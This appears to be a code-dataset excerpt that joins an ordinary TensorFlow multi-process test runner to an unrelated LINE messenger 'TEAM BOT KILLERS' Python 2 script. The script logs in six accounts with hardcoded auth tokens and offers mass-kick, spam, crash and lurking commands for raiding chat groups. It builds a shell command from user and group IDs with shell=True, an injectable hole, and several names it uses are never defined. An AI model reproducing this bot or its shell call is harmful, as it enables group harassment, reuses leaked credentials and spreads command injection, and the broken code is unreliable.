# Use SIGKILL as default. In systems where that's unavailable such as
# windows, use SIGTERM.
sig = sig or getattr(signal, 'SIGKILL', signal.SIGTERM)
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None:
continue
try:
os.kill(p.pid, sig)
self._terminated.add((task_type, task_id))
logging.info('%s-%d terminated with signal %r.', task_type, task_id,
sig)
except ProcessLookupError:
logging.info('Attempting to kill %s-%d but it does not exist.',
task_type, task_id)
def terminate_all(self, sig=None):
"""Terminates all subprocesses."""
with self._process_lock:
self._terminate_all(sig)
class _Process(multi_process_lib.Process):
"""A modified `multiprocessing.Process` that can set up environment variables."""
# TODO(crccw): consider moving other logics in _ProcFunc to _Process.
def __init__(self, test_env, **kwargs):
super(_Process, self).__init__(**kwargs)
self._test_env = test_env
self._actual_run = getattr(self, 'run')
self.run = self._run_with_setenv
def _run_with_setenv(self):
# We need to set environment variables before doing anything because
# setenv() is not thread-safe.
test_env = self._test_env
if test_env.grpc_fail_fast is not None:
os.environ['GRPC_FAIL_FAST'] = str(test_env.grpc_fail_fast)
_set_tf_config(test_env.task_type, test_env.task_id, test_env.cluster_spec,
test_env.rpc_layer)
return self._actual_run()
class _ProcFunc(object):
"""Represents a callable to run in a subprocess."""
@contextlib.contextmanager
def _runtime_mode(self, executing_eagerly):
if executing_eagerly:
with context.eager_mode():
yield
else:
with context.graph_mode():
yield
def _message_checking_func(self, task_type, task_id):
"""A function that regularly checks messages from parent process."""
# TODO(rchao): Remove this once parent uses SIGKILL to terminate subprocess.
while True:
try:
message = self._resources.parent_to_sub_queue.get(block=False)
# Currently the only possible message is termination.
if not message.startswith('terminate'):
raise ValueError('Unrecognized message: {}'.format(message))
if message == 'terminate {} {}'.format(task_type, task_id):
break
else:
# If the message is not targeting this process, put it back to the
# queue.
self._resources.parent_to_sub_queue.put(message)
time.sleep(1)
except Queue.Empty:
time.sleep(0.1)
self._resources.process_status_queue.put(
_ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=True,
exc_info=None,
return_value=None))
# `os._exit(1)` is used to more reliably terminate a subprocess.
os._exit(1) # pylint: disable=protected-access
def _close_streaming(self):
"""Close stdout, stderr and streaming pipe.
We need to explicitly close them since Tensorflow may take a while to exit,
so that the reading threads in the main process can exit more quickly.
"""
sys.stdout.flush()
sys.stderr.flush()
sys.stdout.close()
sys.stderr.close()
self._resources.streaming_pipe_w.close()
def __call__(self, resources, test_env, proc_func, args, kwargs,
use_dill_for_args):
"""The wrapper function that actually gets run in child process(es)."""
global _barrier
self._resources = resources
_barrier = self._resources.barrier
proc_func = dill.loads(proc_func)
if use_dill_for_args:
args = dill.loads(args)
kwargs = dill.loads(kwargs)
if faulthandler is not None:
faulthandler.enable()
faulthandler.register(signal.SIGTERM, chain=True)
# All logging should go to stderr to be streamed to the main process.
logging.set_stderrthreshold(logging.DEBUG)
# Assign sys.stdout and sys.stderr as duplicates of `streaming_pipe_w` so
# print() and logging.*() write directly to `streaming_pipe_w`.
# Unfortunately since we cannot prepend task_type and task_id information to
# the streamed logs we will need a thread per subprocess to distinguish
# where the piece of message is from.
os.dup2(resources.streaming_pipe_w.fileno(), sys.stdout.fileno())
os.dup2(resources.streaming_pipe_w.fileno(), sys.stderr.fileno())
pid = os.getpid()
logging.info('Subprocess with PID %d (%s, %d) is now being started.', pid,
test_env.task_type, test_env.task_id)
# The thread will be dedicated to checking messages from the parent process.
threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._message_checking_func,
args=(test_env.task_type, test_env.task_id),
daemon=True).start()
if test_env.v2_enabled:
v2_compat.enable_v2_behavior()
with self._runtime_mode(test_env.executing_eagerly):
info = _run_contained(test_env.task_type, test_env.task_id, proc_func,
args, kwargs)
self._resources.process_status_queue.put(info)
# Re-raise the exception in addition to reporting it to the parent
# process, so that even if `--test_timeout` flag is set and the
# error doesn't make it to be shown in parent process before bazel's
# timeout, the log would still show what happens in this subprocess,
# instead of silently suppressing the error due to early bazel
# timeout. Raising an error in the subprocess produces stack trace in
# the log, but the program continues running.
if not info.is_successful:
six.reraise(*info.exc_info)
self._close_streaming()
# Exit with code 0 as it's considered successful exit at this point.
sys.exit(0)
class MultiProcessPoolRunner(object):
"""A utility class to start a process pool to simulate a cluster.
It's similar to MultiProcessRunner, but uses a pool of processes to avoid the
expensive initialization cost of Tensorflow.
"""
def __init__(self, cluster_spec, initializer=None):
"""Creates a multi-process pool runner.
Args:
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"]}
initializer: a callable to called at the startup of worker processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
self._cluster_spec = cluster_spec
self._initializer = initializer
self._conn = {}
self._runner = None
def __del__(self):
self.shutdown()
def shutdown(self):
"""Shuts down the worker pool."""
for conn in self._conn.values():
conn.close()
self._conn = {}
if self._runner is not None:
self._runner.join()
self._runner = None
def _start(self):
"""Starts the worker pool."""
# We need different arguments for different processes so we're passing a
# no-op proc_func here and use start_single_process instead.
#
# We also need to start the process pool as daemon, so that they don't block
# the program from exiting. Note that __del__ may not get called when
# there's an exception. The user may also store a pool runner in a global
# object to share across test cases
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
self._runner = MultiProcessRunner(
proc_func=lambda: None,
cluster_spec=self._cluster_spec,
use_dill_for_args=False,
daemon=True)
if self._initializer:
initializer = dill.dumps(self._initializer, dill.HIGHEST_PROTOCOL)
else:
initializer = None
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
conn1, conn2 = multiprocessing.Pipe(duplex=True)
self._conn[(task_type, task_id)] = conn1
self._runner.start_single_process(
task_type,
task_id,
proc_func=_pool_runner_worker,
args=(task_type, task_id, initializer, conn2))
def run(self, proc_func, args=None, kwargs=None):
"""Runs `proc_func` with `args` and `kwargs` on all jobs.
Args:
proc_func: The function to be run.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
Returns:
A list of return values.
"""
# TODO(b/150264776): skip in OSS until it's implemented.
multi_process_lib.Process()
if self._runner is None:
self._start()
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
for conn in self._conn.values():
conn.send((proc_func, args or [], kwargs or {}))
process_statuses = []
for (task_type, task_id), conn in self._conn.items():
logging.info('Waiting for the result from %s-%d', task_type, task_id)
try:
process_statuses.append(conn.recv())
except EOFError:
# This shouldn't happen due to exceptions in proc_func. This usually
# means bugs in the runner.
self.shutdown()
raise RuntimeError('Unexpected EOF. Worker process may have died. '
'Please report a bug')
return_values = []
for process_status in process_statuses:
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
six.reraise(*process_status.exc_info)
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return return_values
def _pool_runner_worker(task_type, task_id, initializer, conn):
"""Function that runs on the workers in a pool.
It listens for callables to run and returns the result until `conn` is closed.
It captures the exceptions during executing the callable and return it through
`conn`.
Args:
task_type: the task type.
task_id: the task index.
initializer: a callable to execute during startup.
conn: a multiprocessing.Connection object to listen for tasks and send
results.
"""
if initializer:
initializer = dill.loads(initializer)
initializer()
while True:
try:
proc_func, args, kwargs = conn.recv()
except EOFError:
break
proc_func = dill.loads(proc_func)
info = _run_contained(task_type, task_id, proc_func, args, kwargs)
sys.stdout.flush()
sys.stderr.flush()
conn.send(info)
def _run_contained(task_type, task_id, proc_func, args, kwargs):
"""Runs `proc_func` with `args` and `kwargs`.
The function returns _ProcessStatusInfo which captures the return value and
the exception.
Args:
task_type: the task type.
task_id: the task index.
proc_func: the function to be run.
args: optional positional arguments to be supplied in `proc_func`.
kwargs: optional keyword arguments to be supplied in `proc_func`.
Returns:
a _ProcessStatusInfo.
"""
is_successful = False
return_value = None
exc_info = None
try:
return_value = proc_func(*args, **kwargs)
is_successful = True
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
# If `proc_func` ends up exiting with `sys.exit()`, the `SystemExit` is not
# handled here.
except Exception: # pylint: disable=broad-except
exc_info = sys.exc_info()
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
class SubprocessTimeoutError(RuntimeError):
"""An error that indicates there is at least one subprocess timing out.
When this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute. See
`MultiProcessRunner.join()` for more information.
"""
def __init__(self, msg, mpr_result):
super(SubprocessTimeoutError, self).__init__(msg)
self.mpr_result = mpr_result
class UnexpectedSubprocessExitError(RuntimeError):
"""An error indicating there is at least one subprocess with unexpected exit.
When this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute. See
`MultiProcessRunner.join()` for more information.
"""
def __init__(self, msg, mpr_result):
super(UnexpectedSubprocessExitError, self).__init__(msg)
self.mpr_result = mpr_result
def _set_tf_config(task_type, task_id, cluster_spec, rpc_layer=None):
"""Set TF_CONFIG environment variable."""
tf_config_dict = {
'cluster': cluster_spec,
'task': {
'type': task_type,
'index': task_id,
},
}
if rpc_layer is not None:
tf_config_dict['rpc_layer'] = rpc_layer
os.environ['TF_CONFIG'] = json.dumps(tf_config_dict)
def run(proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
timeout=_DEFAULT_TIMEOUT_SEC,
args=None,
kwargs=None): # pylint: disable=g-doc-args
"""Runs functions in local child processes.
It is a convenience method that creates a `MultiProcessRunner` object and
invokes `start` and `join` method. Please see these methods for detailed
documentations.
Returns:
A MultiProcessRunnerResult object returned from `MultiProcessRunner.join()`.
"""
runner = MultiProcessRunner(
proc_func,
cluster_spec,
rpc_layer,
max_run_time=max_run_time,
grpc_fail_fast=grpc_fail_fast,
stream_stdout=stream_stdout,
list_stdout=list_stdout,
args=args,
kwargs=kwargs)
runner.start()
return runner.join(timeout)
# This is set by MultiProcessRunner in worker processes.
_barrier = None
def barrier():
if _barrier is None:
raise ValueError(
'barrier is not defined. It is likely because you are calling barrier()'
'in the main process. barrier() can only be called in the subprocesses.'
)
return _barrier
_manager = None
_manager_lock = threading.Lock()
def manager():
"""Returns the multiprocessing manager object for concurrency tools.
The manager object is useful as it controls a server process that holds
the python objects that can be shared across processes. This can be used
for parent-subprocess communication:
```python
manager = multi_process_runner.manager()
some_event_happening_in_subprocess = manager.Event()
mpr = multi_process_runner.MultiProcessRunner(proc_func, cluster_spec,
args=(some_event_happening_in_subprocess,))
mpr.start()
some_event_happening_in_subprocess.wait()
# Do something that only should after some event happens in subprocess.
```
Note that the user of multi_process_runner should not create additional
`multiprocessing.Manager()` objects; doing so can result in segfault in
some cases.
This method should only be called after multi_process_runner.test_main() is
called.
"""
global _manager
with _manager_lock:
if _manager is None:
_manager = multiprocessing.Manager()
return _manager
def test_main():
"""Main function to be called within `__main__` of a test file."""
multi_process_lib.test_main()
|
Botpro.py | # -*- coding: utf-8 -*-
#ღḯḉḯη-тєαм
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
#tinkerbell
cl = LINETCR.LINE()
cl.login(token="EnpqimxsRooeJalqyqe5.nqZhqiZgZilGvU4eyth5jq.y/9smR2c76SyZ9a5oo+RC7IMFj2s9FTIaPD7rWVc0J0=")
cl.loginResult()
#vidia
kt = LINETCR.LINE()
kt.login(token="Eni9sF6Ns15fgAXSGV87.7aNdCEtbMUaAO9Hiv0qoTW.ZIA01S8p0+qqLPs4i/Zu0/AppknZwHFR4JTn25xOT9k=")
kt.loginResult()
#rosetta
ks = LINETCR.LINE()
ks.login(token="EnceHaf6Iy4MCqraHlxc.SJRuNecAXNC8sHurfor2ha.KZqwwycOz6ezjEONNvFMa4V/Z31GMPj5pHQxe9YVVr0=")
ks.loginResult()
#sirvelmist
ki = LINETCR.LINE()
ki.login(token="EnuXybuLxQJxyKzha44d.6WqeC+1pukOllkvQ7Oglhq.3TRa/cgN7HQ4nELvyUYeTNTDzJCDQCGf951tq/HEwpo=")
ki.loginResult()
#fawn
kk = LINETCR.LINE()
kk.login(token="EnWNC28GvfH2C6GY6T32.ZNOnP4uou95euS+Ku1ce4G.ot5wRrwav0m3VQOplLE7O03pnxSPL0wA5GRMR01LueI=")
kk.loginResult()
#iridessa
kc = LINETCR.LINE()
kc.login(token="EnH1CxYghH02JEyzbgjd.6WqeC+1pukOllkvQ7Oglhq./Se/mP9P2L5aQrGPokBeszrw5h/MCvvSeAftmugtWlQ=")
kc.loginResult()
#kicker ghost
#kl = LINETCR.LINE()
#kl.login(token="")
#kl.loginResult()
print "ღḯḉḯη-тєαм"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage="""TEAM BOT KILLERS
➡➡➡MODIFIKASI⬅⬅⬅
⏳Bot1 rename:[text]
⌛Bot2 rename:[text]
⌛Bot3 rename:[text]
͜⌛Bot4 rename:[text]
⌛Bot5 rename:[text]
⌛Bot6 rename:[text]
⌛All rename:[text]
⌛Allbio:[text]
⌛Bot1 clone @[name]
⌛Bot2 clone @[name]
⌛Bot3 clone @[name]
⌛Bot4 clone @[name]
⌛Bot5 clone @[name]
⌛Bot6 clone @[name]
⌛Comment:[text]
⌛Message:[text]
⌛Bot1-6 backup run
⌛Bot1-6 backup
⌛Group name:[text]
********************
🔏THE TEAM BOT KILLERS🔏
====================
💣Admin on @[name]
💣Expel on @[name]
💣Expelall
==================
MODE 0N/OFF
💣Protect:low
💣Protect:high
===================
🔏THE TEAM BOT KILLERS🔏
*******************
➡➡LISTKEYWORD
♻Ban @[name]
♻Unban @[name]
♻Ban group:
♻Del ban:
♻List ban group
♻Banned[send contact]
♻Unbanned[send contact]
♻Ban repeat @[name]
♻Blacklist all
♻Ban cek
♻Clear banlist
♻Mimic target @[name]
♻Mimic untarget @[name]
♻Add friend @[name]
♻Target @[name]
♻Del target @[name]
♻Target list
******************
🔏THE TEAM BOT KILLERS🔏
===================
----SC-INVITE-----
⛔Invite:[mid]
⛔Invite user[contact]
⛔nvite me
⛔Join all
⛔Join group
===================
🔏THE TEAM BOT KILLERS🔏
*******************
---KODE LEAVE GC---
💡Bot2 @bye
💡Bot3 @bye
💡Bot4 @bye
💡Bot5 @bye
💡Bot6 @bye
💡Bye all
💡Center @bye
💡Bye allgroups[own]
💡Leave group:
====================
🔏THE TEAM BOT KILLERS🔏
********************
---SETTING BOT----
🔏Auto join:on/off
🔐Auto leave:on/off
🔏Auto like:on/off
🔏Welcome message:on/off
🔏Auto notice:on/off
🔏Blockinvite:on/off
🔏Auto blockqr:on/off
🔏Namelock:on/off
🔏Mimic:on/off
🔏Auto add:on/off
🔏Check message
🔏Add message:[text]
🔏Comment:on/off
🔏Add comment:[text]
🔐Check comment
🔐Backup:on/off
🔐Gcancel:[number]
🔐Update welcome:[text]
🔐Check welcome message
=======================
🔒THE TEAM BOT KILLERS🔒
=======================
====KODE CANCEL===
🚫Rejectall
🚫Clean invites
🚫Clear invites
**********************
🔏THE TEAM BOT KILLERS🔏
======================
=== Fungsi Gift===
💥gift1-15
💥Spam gift
**********************
🔏THE TEAM BOT KILLERS🔏
======================
---- LIST NOTICE ---
💯Group list
💯Banlist
💯Admin list
💯Settings
💯Ginfo
💯TL:[text]
💯Mimic list
💯Details grup:
💯Crash
💯Add all
=====================
🔏THE TEAM BOT KILLERS🔏
*********************
=== MOD KICK ===
💮Cleanse
💮Vkick @
💮Nk [name]
💮Kick:[mid]
💮Purge
💮Ulti
💮Recover
*********************
➡➡THE TEAM BOT KILLERS⬅⬅
=====================
~~~ FUNGSI CHAT GRUP ~~~
🔍Spamg[on/off][no][txt]
🔍Spam add:[text]
🔍Spam change:[text]
🔍Spam start:[number]
🔍Say [text]
🔍Me
🔍Speed
🔍Debug speed
🔍My mid
🔍Gcreator
🔎Halo
🔎Bot contact
🔎Bot mid
🔎Creator
🔎System
🔎Iconfig
🔎Kernel
🔎Cpu
🔎Responsename
🔎Help
🔎Mc:[mid]
********************
➡➡THE TEAM RENDY KILLS⬅⬅
====================
=== FUNGSI ULTI ===
🔏Lurking
🔏Lurking result
🔏Setlastpoint
🔏Viewlastseen
🔏Link open
🔏Link close
🔏Gurl
🔏Remove chat
🔏Bot restart
=====================
➡➡THE TEAM BOT KILLER⬅⬅
*********************
~~~ FUNGSI CHAT ~~~
🎼Lyric [][]
🎼Music [][]
🎼Wiki [text]
🎼Vidio [text]
🎼Youtube [text]
🎼Instagram [text]
🎼Translate-idn [text]
🎼Translate-eng [text]
🎼Translate-thai [text]
🎼Translate-japan [text]
🎼Emoji [expression]
🎼Info @[name]
🎼Ping
🎼Time
🎼apakah
🎼Sticker [expression]
🎼Mention
🎼/say
🎼/say-en
🎼/say-jp
🎼Dosa @
🎼/
🎼Siapa
********************
🔒THE TEAM BOT KILLS🔒
===================
~~~ FUNGSI BC ~~~
📧Pm cast [text]
📧Broadcast [text]
📧Spam @[name]
====================
➡➡➡THE TEAM RENDY KILLS⬅⬅⬅
********************
===COMMAND BOT===
🔏Turn off bots
********************
====================
➡➡➡TANKS YOU TO MY FRIENDS⬅⬅⬅
====================
"""
KAC=[cl,ki,kk,kc,ks,kt]
mid = cl.getProfile().mid
["u350cc7408cc6cc82e056ee046131f925"]
Amid = ki.getProfile().mid
["uec09c371e4c19ae01aa3d84857440eb7"]
Bmid = kk.getProfile().mid
["ub23ad49c409ac6773c4a151114e4761c"]
Cmid = kc.getProfile().mid
["ueb040473fd4f50aa0b2ca56aee818b1d"]
Dmid = ks.getProfile().mid
["uce7a0da7850e53de4452cfe4535084e2"]
Emid = kt.getProfile().mid
["ub51bc97c5e4f603f1dff35e9512550d3"]
#Fmid = kl.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,"u350cc7408cc6cc82e056ee046131f925","uec09c371e4c19ae01aa3d84857440eb7","ub23ad49c409ac6773c4a151114e4761c","ueb040473fd4f50aa0b2ca56aee818b1d","uce7a0da7850e53de4452cfe4535084e2","ub51bc97c5e4f603f1dff35e9512550d3"]
admin = ["u350cc7408cc6cc82e056ee046131f925","ub51bc97c5e4f603f1dff35e9512550d3"]
owner = ["u350cc7408cc6cc82e056ee046131f925","ub51bc97c5e4f603f1dff35e9512550d3"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add Me",
"lang":"JP",
"comment":"AutoLike by TBK[TEAM BOT KILLERS]",
"welmsg":"welcome to group",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"status":False,
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"welcomemsg":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
wait3 = {
"copy":False,
"copy2":"target",
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kt.getProfile()
backup = kt.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = kt.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
kt.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kt.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
kd.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
#=====================================================================================
if op.param3 in mid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
